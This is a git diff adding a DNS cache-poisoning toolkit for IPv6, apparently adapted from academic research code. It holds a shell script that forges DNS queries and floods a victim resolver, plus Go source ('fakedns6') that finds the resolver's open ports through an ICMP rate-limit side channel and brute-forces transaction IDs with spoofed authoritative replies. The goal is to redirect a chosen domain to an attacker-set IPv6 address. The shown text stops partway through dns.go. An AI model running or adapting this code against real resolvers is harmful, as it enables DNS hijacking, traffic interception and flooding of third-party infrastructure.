index 0000000..a28c16d
--- /dev/null
+++ b/4_v6_injection/dns.bin
Binary files differ
diff --git a/4_v6_injection/dns_OPT.bin b/4_v6_injection/dns_OPT.bin
new file mode 100644
index 0000000..e0dcbc1
--- /dev/null
+++ b/4_v6_injection/dns_OPT.bin
Binary files differ
diff --git a/4_v6_injection/dns_end.bin b/4_v6_injection/dns_end.bin
new file mode 100644
index 0000000..8aa4774
--- /dev/null
+++ b/4_v6_injection/dns_end.bin
Binary files differ
diff --git a/4_v6_injection/dns_mid.bin b/4_v6_injection/dns_mid.bin
new file mode 100644
index 0000000..2d17a14
--- /dev/null
+++ b/4_v6_injection/dns_mid.bin
@@ -0,0 +1 @@
+attackduktigxyz \ No newline at end of file
diff --git a/4_v6_injection/dns_query.sh b/4_v6_injection/dns_query.sh
new file mode 100755
index 0000000..e73d68b
--- /dev/null
+++ b/4_v6_injection/dns_query.sh
@@ -0,0 +1,50 @@
+# usage ./dns_query.sh [Resolver IP] [Wanted IP] [iface] [domain (e.g. www google com)]
+# clear the previous files
+sleep 1
+echo "初始化工具环境"
+
+# 创建空的二进制文件,dns_mid.bin 和 txid.bin
+dd if=/dev/null of=dns_mid.bin > /dev/null 2>&1
+dd if=/dev/null of=txid.bin > /dev/null 2>&1
+
+# write the domain name into the binary
+domains=$(echo $4| sed "s/\./ /g") # 将域名转换为空格分隔的字符串
+for var in ${domains:0} # 遍历域名的每个部分
+do
+ size=${#var} # 获取当前域名的长度
+ echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin # 写入长度
+ echo -n "$var" >> dns_mid.bin # 写入域名
+done
+
+# set a random TxID
+echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
+echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
+
+# forge a entire DNS query packet
+cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
+# change the sending speed if necessary (-i). Set it to "flood" (replace -i with --flood) to maximize the power.
+# fire!
+echo "尝试触发权威服务器请求速率限制"
+# 使用udp6工具发送DNS查询数据包,指定目标和速率
+udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2 > /dev/null 2>&1
+sleep 1
+
+a=$(($RANDOM % 9 + 1))
+echo "a:$a"
+if [ $a -gt 6 ]; then
+ #echo "dns-TIP:$1"
+ #echo "dns-WIP:$2"
+ #echo "dns-iface:$3"
+ #echo "dns-domain:$4"
+ ./fakedns6 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1
+ # b, Back-end IP of the victim resolver, 目标解析器的IP地址
+ # i, Interface for attacking, 攻击使用的接口
+ # n, the domain name to be poisoned, 要进行缓存投毒的域名
+ # r, Front-end IP of the victim resolver
+ # t, Timeout in ms for outgoing dns queries to the victim resolver
+ # at, 攻击者想要更改到的IP地址
+ # tg, time gap is us between the TxID brute force packets
+ echo "0"
+fi
+
+
diff --git a/4_v6_injection/dns_start.bin b/4_v6_injection/dns_start.bin
new file mode 100644
index 0000000..e6e4242
--- /dev/null
+++ b/4_v6_injection/dns_start.bin
Binary files differ
diff --git a/4_v6_injection/fakedns6 b/4_v6_injection/fakedns6
new file mode 100755
index 0000000..0f7712d
--- /dev/null
+++ b/4_v6_injection/fakedns6
Binary files differ
diff --git a/4_v6_injection/fakedns6-演示.zip b/4_v6_injection/fakedns6-演示.zip
new file mode 100644
index 0000000..856dcdc
--- /dev/null
+++ b/4_v6_injection/fakedns6-演示.zip
Binary files differ
diff --git a/4_v6_injection/src/ucr.edu/fakedns6/attack.go b/4_v6_injection/src/ucr.edu/fakedns6/attack.go
new file mode 100644
index 0000000..ab5430f
--- /dev/null
+++ b/4_v6_injection/src/ucr.edu/fakedns6/attack.go
@@ -0,0 +1,714 @@
+package main
+
+import (
+ "flag"
+ "fmt"
+ "log"
+ "math/rand"
+ "net"
+ "os"
+ "strconv"
+ "strings"
+ "sync"
+ "time"
+
+ "github.com/google/gopacket"
+ "github.com/google/gopacket/layers"
+ "github.com/google/gopacket/pcap"
+ "github.com/google/gopacket/routing"
+ "github.com/miekg/dns"
+)
+
+var handle *pcap.Handle
+var ethernetLayer *layers.Ethernet
+var victimDNSName string
+var dnsQueryName string
+var authIP net.IP
+var resolverIP net.IP
+var localIP []net.IP
+var defaultJitter uint
+var gotReply = false
+var attackerControlledDomain string
+var attackForwarder bool
+var repeatTimes int
+var timeGap uint
+var auxiliaryDomain string
+var soaName string
+
+var jitter uint = 10
+var rtt uint = 1 // in ms
+var debugOutput = true
+
+const GROUP_SIZE = 50
+
+/* I'm not sure what's this used for. Probably used with older version where multiple IPs is not supported. */
+//var sendingChannel chan *outgoingPacket
+var backendResolvers = make([]*backendResolver, 0)
+var bruteForceShouldBeKilled = false
+
+type backendResolver = struct {
+ resolverBackendIP net.IP
+
+ groups [][]uint16 // = make([][]uint16, 65536)
+ groupIDCounter uint32 // = 3
+ groupIDCounterLock *sync.Mutex
+ groupSendTime []time.Time // = make([]time.Time, 65536)
+
+ probeChannel chan uint32 //= make(chan uint16, 655)
+ priorityProbeChannel chan uint32 //= make(chan uint16, 655)
+ alwaysOpenPorts []bool //= make([]bool, 65536)
+
+ perIPLimitCounter []int //= 6
+
+ networkXmitLock *sync.Mutex
+}
+
+// timeout in ms
+func dnsRequestSender(timeout uint) {
+ for {
+ gotReply = false
+ sendDNSRequest(uint16(rand.Uint32()), dnsQueryName)
+ retryTimes := timeout / 500
+ for {
+ if !gotReply {
+ time.Sleep(500 * time.Millisecond)
+ retryTimes--
+ if retryTimes == 0 {
+ break
+ }
+ } else {
+ if debugOutput {
+ fmt.Println("Got reply in", timeout-retryTimes*500, "ms")
+ } else {
+ fmt.Println("Rx")
+ }
+ break
+ }
+ }
+ if !attackForwarder {
+ dnsQueryName = strconv.Itoa(rand.Int()) + "." + victimDNSName
+ } else {
+ /* I'm not sure if we should change the nonce. */
+ dnsQueryName = strconv.Itoa(rand.Int()) + "." + attackerControlledDomain
+ }
+ }
+}
+
+func receivingThread() {
+ for {
+ data, captureInfo, err := handle.ReadPacketData()
+ if err == pcap.NextErrorTimeoutExpired {
+ continue
+ } else if err != nil {
+ log.Printf("error reading packet: %v", err)
+ continue
+ }
+
+ // Parse the packet. We'd use DecodingLayerParser here if we
+ // wanted to be really fast.
+ packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy)
+
+ // Find the packets we care about, and print out logging
+ // information about them. All others are ignored.
+ if rspNet := packet.NetworkLayer(); rspNet == nil {
+ continue
+ } else if rspIPLayer := packet.Layer(layers.LayerTypeIPv6); rspIPLayer == nil {
+ continue
+ //} else if rspIP := rspIPLayer.(*layers.IPv4); rspIP == nil {
+ } else if rspIP := rspIPLayer.(*layers.IPv6); rspIP == nil {
+ continue
+ } else if rspIP.NextHeader != layers.IPProtocolICMPv6 {
+ if rspIP.FlowLabel != 2 && rspIP.NextHeader == layers.IPProtocolUDP && compareIPv6Addr(rspIP.SrcIP, resolverIP) == 0 {
+ rspUDPLayer := packet.Layer(layers.LayerTypeUDP)
+ if rspUDPLayer != nil && rspUDPLayer.(*layers.UDP).SrcPort == 53 {
+ rspDNSLayer := packet.Layer(layers.LayerTypeDNS)
+ if rspDNSLayer != nil {
+ rspDNS := rspDNSLayer.(*layers.DNS)
+ if rspDNS.QR == true {
+ if len(rspDNS.Authorities) != 0 && rspDNS.ResponseCode == layers.DNSResponseCodeNXDomain && string(rspDNS.Questions[0].Name) == dnsQueryName &&
+ string(rspDNS.Authorities[0].Name) == victimDNSName && string(rspDNS.Authorities[0].SOA.MName) == soaName {
+ fmt.Println("Success!!")
+ os.Exit(0)
+ //unbound won't cache NS record that leads to SOA NXDOMAIN reply, so we make it positive response
+ //This is also used for forwarder attack
+ } else if string(rspDNS.Questions[0].Name) == dnsQueryName && rspDNS.ResponseCode == layers.DNSResponseCodeNoErr {
+ for _, record := range rspDNS.Answers {
+ if record.Type == layers.DNSTypeAAAA {
+ fmt.Println("Success2!!")
+ os.Exit(0)
+ }
+ }
+ } else if string(rspDNS.Questions[0].Name) == dnsQueryName {
+ gotReply = true
+ }
+ }
+ }
+ }
+ }
+ continue
+ } else if rspICMPLayer := packet.Layer(layers.LayerTypeICMPv6); rspICMPLayer == nil {
+ continue
+ } else if rspICMP, ok := rspICMPLayer.(*layers.ICMPv6); !ok {
+ continue
+ } else if rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodePortUnreachable) &&
+ rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodeAdminProhibited) {
+ continue
+ } else if nestedIpData := rspICMP.Payload; nestedIpData == nil {
+ continue
+ } else if nestedIpPacket := gopacket.NewPacket(nestedIpData, layers.LayerTypeIPv6, gopacket.NoCopy); nestedIpPacket == nil {
+ continue
+ } else if nestedIpLayer := nestedIpPacket.Layer(layers.LayerTypeIPv6); nestedIpLayer == nil {
+ continue
+ } else if nestedIp := nestedIpLayer.(*layers.IPv6); nestedIp == nil {
+ continue
+ } else {
+ r := getBackendResolver(nestedIp.DstIP)
+ if r != nil {
+
+ nestedUDPLayer := nestedIpPacket.Layer(layers.LayerTypeUDP)
+ if nestedUDPLayer == nil {
+ fmt.Println("nestedUDPLayer == nil")
+ continue
+ }
+ nestedUDP := nestedUDPLayer.(*layers.UDP)
+ if nestedUDP == nil {
+ fmt.Println("nestedUDP == nil")
+ continue
+ }
+
+ //got verification packet back
+ if nestedIp.FlowLabel > 1 {
+ //update rtt
+ /* Potential BUG: rtt of both resolver may not be the same. */
+ newrtt := captureInfo.Timestamp.Sub(r.groupSendTime[nestedIp.FlowLabel]).Nanoseconds()/1000000 + 1
+ if newrtt >= 0 && newrtt < 5000 {
+ var draftJitter uint = 0
+ if uint(newrtt) > rtt {
+ draftJitter = uint(newrtt) - rtt
+ } else {
+ draftJitter = (jitter + (rtt - uint(newrtt))) / 2
+ }
+ if jitter > 30 {
+ fmt.Println("Jitter > 30ms!")
+ jitter = 10
+ } else {
+ jitter = draftJitter
+ }
+ rtt = uint(newrtt)
+ if debugOutput {
+ fmt.Println("rtt=", rtt, ", jitter=", jitter)
+ }
+ } else {
+ fmt.Println("newrtt error:", newrtt)
+ }
+ //reduce ratelimit counter
+ localIPNum := getLocalIPNum(nestedIp.SrcIP)
+ if localIPNum != -1 {
+ if r.perIPLimitCounter[localIPNum] >= 0 {
+ r.perIPLimitCounter[localIPNum]--
+ }
+ if r.perIPLimitCounter[localIPNum] < 0 {
+ if debugOutput {
+ /* This may happen in real attacks. Don't panic :). */
+ fmt.Println(r.resolverBackendIP, "bug: perIPLimitCounter < 0")
+ }
+ }
+ if debugOutput {
+ fmt.Println(r.resolverBackendIP, "remaining counter:", localIPNum, r.perIPLimitCounter[localIPNum])
+ }
+ } else {
+ if debugOutput {
+ fmt.Println("received unwanted ICMP for", nestedIp.SrcIP)
+ }
+ }
+ //process the packet
+ binarySearch(r, nestedIp.FlowLabel)
+ }
+ /* This is used to terminate TxID brute forcing earlier if we found the port is indeed not open (i.e., false positive) to avoid wasting time.
+ * Check related code to see if this really works before uncommenting this.
+ * This may not be useful since brute force only takes ~800ms, which is fairly short.
+ * To uncomment this, make clear which backend resolver sent the message so that resolvers won't interfere with each other */
+ //else if nestedIp.Id == 2 {
+ // //got verification packet for DNS brute forcing
+ // bruteForceShouldBeKilled = false
+ //}
+ }
+ }
+ }
+}
+
+func binarySearch(r *backendResolver, flowlabel uint32) {
+ groupLen := 0
+ group := r.groups[flowlabel]
+
+ for _, port := range group {
+ if port != 65535 {
+ groupLen++
+ } else {
+ break
+ }
+ }
+
+ if groupLen == 1 {
+ //brute force
+ r.networkXmitLock.Lock()
+ dnsBruteForce(group[0], timeGap, r.resolverBackendIP, auxiliaryDomain)
+ r.networkXmitLock.Unlock()
+ r.alwaysOpenPorts[group[0]] = true
+ } else if groupLen > 1 {
+ var repeatTimes1 int
+ if repeatTimes > 1 {
+ repeatTimes1 = repeatTimes + 1
+ } else {
+ repeatTimes1 = 1
+ }
+ for j := 0; j < repeatTimes1; j++ {
+ //left
+ id := allocateGroupID(r)
+ r.groups[id] = make([]uint16, groupLen/2)
+ copy(r.groups[id], group[0:groupLen/2])
+ for len(r.groups[id]) < GROUP_SIZE {
+ r.groups[id] = append(r.groups[id], 65535)
+ }
+ if debugOutput {
+ fmt.Println(r.resolverBackendIP, "bs", r.groups[id][0], "+", groupLen/2)
+ } else {
+ fmt.Println("Found something interesting!")
+ }
+ r.priorityProbeChannel <- flowlabel
+
+ //right
+ id = allocateGroupID(r)
+ r.groups[id] = make([]uint16, groupLen-groupLen/2)
+ copy(r.groups[id], group[groupLen/2:groupLen])
+ for len(r.groups[id]) < GROUP_SIZE {
+ r.groups[id] = append(r.groups[id], 65535)
+ }
+ //fmt.Println(r.resolverBackendIP, "bsr", r.groups[id][0], "+", groupLen-groupLen/2)
+ r.priorityProbeChannel <- flowlabel
+ }
+ } else {
+ if debugOutput {
+ fmt.Println(r.resolverBackendIP, "bug: groupLen <= 0, id=", flowlabel)
+ for _, port := range group {
+ fmt.Print(port)
+ }
+ }
+ }
+}
+
+func perIPLimitRecover(r *backendResolver, num int) {
+ for {
+ if r.perIPLimitCounter[num] < 6 {
+ time.Sleep(time.Second + (time.Duration(defaultJitter)+50)*time.Millisecond)
+ r.perIPLimitCounter[num]++
+ } else {
+ time.Sleep((time.Duration(defaultJitter) + 1) * time.Millisecond)
+ }
+ }
+}
+
+func probeSender(r *backendResolver) {
+ for {
+
+ var id uint32
+ select {
+ case id = <-r.priorityProbeChannel:
+ break
+ case id = <-r.probeChannel:
+ break
+ //default:
+ // time.Sleep(time.Microsecond)
+ }
+
+ /* in favor of brute force when there is no per ip permit and there is only one port in group */
+ if getIPwithAvailableCounter(r) == nil && r.groups[id][1] == 65535 {
+ //brute force
+ r.networkXmitLock.Lock()
+ dnsBruteForce(r.groups[id][0], timeGap, r.resolverBackendIP, auxiliaryDomain)
+ r.networkXmitLock.Unlock()
+ r.alwaysOpenPorts[r.groups[id][0]] = true
+ continue
+ }
+ //test per ip rate limit
+ var verifyIP net.IP
+ for {
+ verifyIP = getIPwithAvailableCounter(r)
+ if verifyIP == nil {
+ time.Sleep(time.Millisecond)
+ } else {
+ break
+ }
+ }
+
+ //send
+ ports := r.groups[id]
+ r.networkXmitLock.Lock()
+ for i := 0; i < GROUP_SIZE; i++ {
+ if defaultJitter <= 3 {
+ if attackForwarder {
+ xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 100)
+ } else {
+ xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 1)
+ }
+ } else {
+ xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 0)
+ }
+ }
+ time.Sleep(time.Duration(defaultJitter) * time.Millisecond)
+ //verify
+ xmitUDPv6(verifyIP, r.resolverBackendIP, 53, 65535, id, 10)
+ r.groupSendTime[id] = time.Now()
+ if rand.Uint32()%100 < 2 {
+ if debugOutput {
+ fmt.Println(r.resolverBackendIP, "probing", ports[0])
+ } else {
+ fmt.Println("Continue attacking...")
+ }
+ }
+
+ //recover global counter
+ if !attackForwarder {
+ time.Sleep(time.Duration(60-defaultJitter) * time.Millisecond)
+ } else {
+ /* IDK why I wrote this line. Forwarders should be the same as resolvers if they support global rate limit. */
+ time.Sleep(time.Duration(60) * time.Millisecond)
+ }
+ r.networkXmitLock.Unlock()
+ }
+}
+
+func portGroupFormer(r *backendResolver, startPort uint, endPort uint) {
+ for {
+ //divide into groups
+ var id uint32 = 0
+ var currentGroupSize = 0
+
+ for i := startPort; i <= endPort; i++ {
+ /* It's unlikely the port is reused for further queries. But it's still possible. Uncomment here if you feed like port reusing is unlikely to happen. */
+ //if r.alwaysOpenPorts[i] {
+ // continue
+ //}
+ if currentGroupSize%GROUP_SIZE == 0 {
+ if id != 0 {
+ r.probeChannel <- id
+ for j := 1; j < repeatTimes; j++ {
+ //dup
+ previd := id
+ id = allocateGroupID(r)
+ r.groups[id] = make([]uint16, len(r.groups[previd]))
+ copy(r.groups[id], r.groups[previd])
+ r.probeChannel <- id
+ }
+ }
+
+ id = allocateGroupID(r)
+ r.groups[id] = make([]uint16, 0)
+ }
+
+ r.groups[id] = append(r.groups[id], uint16(i))
+ currentGroupSize++
+ }
+
+ //deal with last several cases
+ if /*len(r.groups[id]) != 50 &&*/ len(r.groups[id]) != 0 {
+ for len(r.groups[id]) != 50 && len(r.groups[id]) != 0 {
+ r.groups[id] = append(r.groups[id], 65535)
+ }
+
+ r.probeChannel <- id
+
+ for j := 1; j < repeatTimes; j++ {
+ //dup
+ previd := id
+ id = allocateGroupID(r)
+ r.groups[id] = make([]uint16, len(r.groups[previd]))
+ copy(r.groups[id], r.groups[previd])
+ r.probeChannel <- id
+ }
+ }
+ }
+}
+
+func main() {
+
+ /* This program only finds & injects DNS responses automatically. Additional authoritative server muting/flooding scripts are needed. */
+ /* IPv6 is not supported yet. */
+ /* Use "-h to get usage. " */
+ /* Author: Keyu Man ([email protected]) */
+ /* Attaching PoC? */
+ /* Add Paper Bio? */
+ ifaceName := flag.String("i", "vmnet1", "Interface for attacking. Multiple interfaces are not supported. Multiple IPs per interface is supported.")
+ /* If automatic MAC address discovery doesn't work. consider enable this option and feed it to the MAC field. */
+ // gateWayMacStr := flag.String("g", "00:11:22:33:44:55", "Gateway Mac")
+ authServer := flag.String("a", "", "Authoritative server for the domain to be poisoned.")
+ resolver := flag.String("r", "8.8.8.8", "Front-end IP of the victim resolver.")
+ resolverBackend := flag.String("b", "", "Back-end IP of the victim resolver.")
+ resolverBackendList := flag.String("bn", "", "Back-end IP list of the victim resolver. One per line. This would overwrite \"-b\" and is used when the server has multiple backend IPs.")
+ startPort := flag.Uint("s", 1, "Lowest port # for the port scan range, inclusive.")
+ endPort := flag.Uint("e", 65534, "Highest port # for the port scan range, inclusive.")
+ victimDNSName := flag.String("n", "", "The domain name to be poisoned.")
+ dnsQueryTmeout := flag.Uint("t", 4000, "Timeout in ms for outgoing dns queries to the victim resolver. Should be aligned with the resolver's timeout (e.g., BIND is 10000ms by default).")
+ defaultJitter := flag.Uint("j", 5, "Time gap between verification packet and the latest probe packet in a group. Increase the value if Jitter is increased.")
+ repeatTimes := flag.Uint("R", 1, "Retransmit/Reprobe a group of ports for X times to reduce FNs.")
+ timeGap := flag.Uint("tg", 0, "Time gap is us(microseconds) between the TxID brute force packets.")
+ //auxiliaryDomain := flag.String("ad", "", "Attacker-controlled domain used to host the fake NS for the victim domain and to store the fake AAAA record of the victim domain.")
+ attackertarget := flag.String("at", "", "攻击者想要更改到的IPv6地址")
+ debugOutput := flag.Bool("d", false, "Debug output mode.")
+ attackerMaliciousDomain := flag.String("af", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.")
+ soaName := flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)")
+
+ //特殊用途
+ isfake := flag.Int("f", 0, "")
+ flag.Parse()
+ //gatewayMac, _ := net.ParseMAC(*gateWayMacStr)
+ Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTmeout, *defaultJitter,
+ *attackerMaliciousDomain, *resolverBackendList, *debugOutput, *repeatTimes, *timeGap, *attackertarget, *soaName, *isfake)
+ os.Exit(0)
+}
+
+func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBackendIPArg net.IP, startPort uint, endPort uint, victimDNSNameArg string, dnsQueryTimeout uint,
+ defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg uint, timeGapArg uint, attackertargetIP string,
+ soaNameArg string, isfake int) {
+ fmt.Println("/***Please make sure to fill every argument carefully and correct. Otherwise the program will crash.***/")
+ // 特殊用途
+ if isfake == 1 {
+ c := new(dns.Client)
+ msg := new(dns.Msg)
+ if strings.Contains(attackertargetIP, ":") { // attackertargetIP -- 攻击者要更改到的IPv6地址
+ println("目标:" + resolverBackendIPArg.String()) // resolverBackendIPArg -- Back-end IP of the victim resolver
+ ipcode := strings.ReplaceAll(attackertargetIP, ":", "-")
+ if victimDNSNameArg[len(victimDNSNameArg)-1:] != "." { // victimDNSNameArg -- The domain name to be poisoned
+ victimDNSNameArg = victimDNSNameArg + "."
+ }
+ domain := ipcode + "." + victimDNSNameArg
+
+ fmt.Println("查询的目标域名:" + domain)
+
+ msg.SetQuestion(domain, dns.TypeAAAA)
+ _, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(), "53"))
+ return
+ } else {
+ println(attackertargetIP)
+ println(victimDNSNameArg)
+ println("参数有误,请输入IPv6地址作为篡改目标结果")
+ }
+ } else {
+ c := new(dns.Client)
+ msg := new(dns.Msg)
+ // domain := "www.google.com."
+ // msg.SetQuestion(domain, dns.TypeAAAA)
+ // for i := 0; i < 10000; i++ {
+ // go func() {
+ // _, _, _ = c.Exchange(msg, net.JoinHostPort("8.8.8.8", "53"))
+ // }()
+ // }
+ domain := "daffteg." + victimDNSNameArg
+ msg.SetQuestion(domain, dns.TypeAAAA)
+ _, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(), "53"))
+ return
+ }
+
+ rand.Seed(time.Now().UnixNano())
+ handle, _ = pcap.OpenLive(
+ ifaceName,
+ 65536,
+ true,
+ pcap.BlockForever,
+ )
+ println(authIPArg.To16().String())
+ err := handle.SetBPFFilter("not host " + authIPArg.To16().String())
+ if err != nil {
+ fmt.Println("cannot set BPF filter.")
+ }
+ iface, err := net.InterfaceByName(ifaceName)
+ if err != nil {
+ fmt.Println("cannot open network interface")
+ os.Exit(1)
+ }
+
+ if attackerMaliciousDomainArg != "" {
+ attackForwarder = true
+ fmt.Println("Forwarder Attack Mode!")
+ attackerControlledDomain = attackerMaliciousDomainArg
+ }
+
+ authIP = authIPArg
+ resolverIP = resolverIPArg
+ victimDNSName = victimDNSNameArg
+ debugOutput = debugOutputArg
+ timeGap = timeGapArg
+ soaName = soaNameArg
+
+ localIP, _ = GetIfaceAddrMulti(iface)
+ nonce := strconv.Itoa(rand.Int())
+
+ if !attackForwarder {
+ dnsQueryName = nonce + "." + victimDNSName
+ } else {
+ dnsQueryName = nonce + "." + attackerControlledDomain
+ }
+
+ defaultJitter = defaultJitterArg
+ repeatTimes = int(repeatTimesArg)
+
+ if resolverBackendList != "" {
+ file, err := os.Open(resolverBackendList)
+ if err != nil {
+ fmt.Println(err)
+ os.Exit(10)
+ }
+ for {
+ var resolverIP string
+ n, err := fmt.Fscanf(file, "%s", &resolverIP)
+ if n <= 0 || err != nil {
+ break
+ }
+ backendResolvers = append(backendResolvers, backendResolverBuilder(net.ParseIP(resolverIP)))
+ }
+ } else {
+ //r1 shouldn't be nil
+ r1 := backendResolverBuilder(resolverBackendIPArg)
+ backendResolvers = append(backendResolvers, r1)
+ }
+
+ //figure out MAC address
+ //test if it's in LAN first
+ dstMac, err := GetGatewayAddr(iface, handle, backendResolvers[0].resolverBackendIP.To16())
+ if err == nil {
+ ethernetLayer = &layers.Ethernet{
+ SrcMAC: iface.HardwareAddr,
+ DstMAC: dstMac,
+ //EthernetType: layers.EthernetTypeIPv4,
+ EthernetType: layers.EthernetTypeIPv6,
+ }
+ fmt.Println("Mac:", dstMac)
+ } else {
+ //query routing table
+ router, err := routing.New()
+ if err != nil {
+ fmt.Println(err)
+ os.Exit(4)
+ }
+ _, nextHopIP, _, err := router.Route(backendResolvers[0].resolverBackendIP)
+ if err != nil {
+ fmt.Println(err)
+ os.Exit(5)
+ }
+ dstMac, err := GetGatewayAddr(iface, handle, nextHopIP.To16())
+ if err != nil {
+ fmt.Println(err)
+ os.Exit(6)
+ }
+ fmt.Println("MAC:", dstMac)
+ ethernetLayer = &layers.Ethernet{
+ SrcMAC: iface.HardwareAddr,
+ DstMAC: dstMac,
+ //EthernetType: layers.EthernetTypeIPv4,
+ EthernetType: layers.EthernetTypeIPv6,
+ }
+ }
+
+ go receivingThread()
+
+ for i, ip := range localIP {
+ if debugOutput {
+ fmt.Println("use IP", ip)
+ }
+ for _, r := range backendResolvers {
+ go perIPLimitRecover(r, i)
+ }
+ }
+ go dnsRequestSender(dnsQueryTimeout)
+
+ for _, r := range backendResolvers {
+ go probeSender(r)
+ go portGroupFormer(r, startPort, endPort)
+ time.Sleep(25 * time.Millisecond)
+ }
+
+ time.Sleep(999 * time.Hour)
+
+}
+
+func allocateGroupID(r *backendResolver) uint32 {
+ r.groupIDCounterLock.Lock()
+ id := r.groupIDCounter
+ r.groupIDCounter++
+ if r.groupIDCounter == 0 {
+ r.groupIDCounter = 3
+ }
+ r.groupIDCounterLock.Unlock()
+ return id
+}
+
+func getBackendResolver(resolverIP net.IP) *backendResolver {
+ for _, r := range backendResolvers {
+ if compareIPv6Addr(r.resolverBackendIP, resolverIP) == 0 {
+ return r
+ }
+ }
+ return nil
+}
+
+func lockNetwork() {
+ for _, r := range backendResolvers {
+ r.networkXmitLock.Lock()
+ }
+}
+
+func unlockNetwork() {
+ for _, r := range backendResolvers {
+ r.networkXmitLock.Unlock()
+ }
+}
+
+func getLocalIPNum(ip net.IP) int {
+ for i, localip := range localIP {
+ if compareIPv6Addr(localip, ip) == 0 {
+ return i
+ }
+ }
+ return -1
+}
+
+func backendResolverBuilder(backendIP net.IP) *backendResolver {
+
+ if backendIP == nil {
+ return nil
+ }
+ temp := backendResolver{
+ resolverBackendIP: backendIP,
+ groups: make([][]uint16, 65536),
+ groupIDCounter: 3,
+ groupIDCounterLock: &sync.Mutex{},
+ groupSendTime: make([]time.Time, 65536),
+ probeChannel: make(chan uint32, 655),
+ priorityProbeChannel: make(chan uint32, 655),
+ alwaysOpenPorts: make([]bool, 65536),
+ perIPLimitCounter: make([]int, len(localIP)),
+ networkXmitLock: &sync.Mutex{},
+ }
+ for i := range temp.perIPLimitCounter {
+ temp.perIPLimitCounter[i] = 6
+ }
+ for i := 0; i < 65536; i++ {
+ temp.alwaysOpenPorts[i] = false
+ }
+ temp.alwaysOpenPorts[53] = true
+ temp.alwaysOpenPorts[0] = true
+ temp.alwaysOpenPorts[65535] = true
+ return &temp
+
+}
+
+// distribute verification to multiple IPs evenly
+func getIPwithAvailableCounter(r *backendResolver) net.IP {
+ seed := rand.Int() % len(localIP)
+ for i := 0; i < len(localIP); i++ {
+ if r.perIPLimitCounter[(i+seed)%len(localIP)] > 0 {
+ return localIP[(i+seed)%len(localIP)]
+ }
+ }
+ return nil
+}
diff --git a/4_v6_injection/src/ucr.edu/fakedns6/dns.go b/4_v6_injection/src/ucr.edu/fakedns6/dns.go
new file mode 100644
index 0000000..5af9631
--- /dev/null
+++ b/4_v6_injection/src/ucr.edu/fakedns6/dns.go
@@ -0,0 +1,332 @@
+package main
+
+import (
+ "fmt"
+ "github.com/google/gopacket/layers"
+ "math/rand"
+ "net"
+ "time"
+)
+
+var bruteForceCouldBeKilled bool
+
+func sendDNSRequest(id uint16, name string) {
+ if debugOutput {
+ fmt.Println("Send new DNS request", name, id)
+ }
+ _sendDNSRequest(id, name, localIP[0], resolverIP, (layers.UDPPort)(rand.Uint32()), 53)
+}
+
+func _sendDNSRequest(id uint16, name string, src net.IP, dst net.IP, sport layers.UDPPort, dport layers.UDPPort) {
+ ipLayer := layers.IPv6{
+ FlowLabel: 1,
+ SrcIP: src,
+ DstIP: dst,
+ Version: 6,
+ HopLimit: 64,
+ NextHeader: layers.IPProtocolUDP,
+ //Flags: layers.IPv4DontFragment,
+ }
+ udpLayer := layers.UDP{
+ SrcPort: sport,
+ DstPort: dport,
+ }
+ dnsLayer := layers.DNS{
+ ID: id,
+ QR: false,
+ OpCode: 0,
+ AA: false,
+ TC: false,
+ RD: true,
+ RA: false,
+ Z: 0,
+ ResponseCode: 0,
+ QDCount: 1,
+ ANCount: 0,
+ NSCount: 0,
+ ARCount: 0,
+ Questions: []layers.DNSQuestion{{
+ Name: []byte(name),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ }},
+ Authorities: nil,
+ Additionals: nil,
+ }
+ err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
+ if err != nil {
+ fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go pos 0 error", err)
+ }
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
+ if err != nil {
+ fmt.Println("can not send packet @ sendDNSRequest: ", err)
+ }
+}
+
+func bruteForceTerminatingTimer(timegap uint) {
+ time.Sleep(time.Duration(timegap) * time.Millisecond)
+ bruteForceCouldBeKilled = true
+}
+
+func dnsBruteForce(targetPort uint16, timegap uint, resolverBackendIP net.IP, auxDomain string) {
+ bruteForceShouldBeKilled = true
+ bruteForceCouldBeKilled = false
+ ipLayer := layers.IPv6{
+ FlowLabel: 2,
+ SrcIP: authIP,
+ DstIP: resolverBackendIP,
+ Version: 6,
+ HopLimit: 64,
+ NextHeader: layers.IPProtocolUDP,
+ //Flags: layers.IPv4DontFragment,
+ }
+ udpLayer := layers.UDP{
+ SrcPort: 53,
+ DstPort: layers.UDPPort(targetPort),
+ }
+ dnsLayer := layers.DNS{
+ ID: 0,
+ QR: true,
+ OpCode: 0,
+ AA: true,
+ TC: false,
+ RD: false,
+ RA: false,
+ Z: 0,
+ ResponseCode: layers.DNSResponseCodeNoErr,
+
+ /* Answers for A request for ns.a.com */
+ //Questions: []layers.DNSQuestion{{
+ // Name: []byte(victimAuthName),
+ // Type: layers.DNSTypeA,
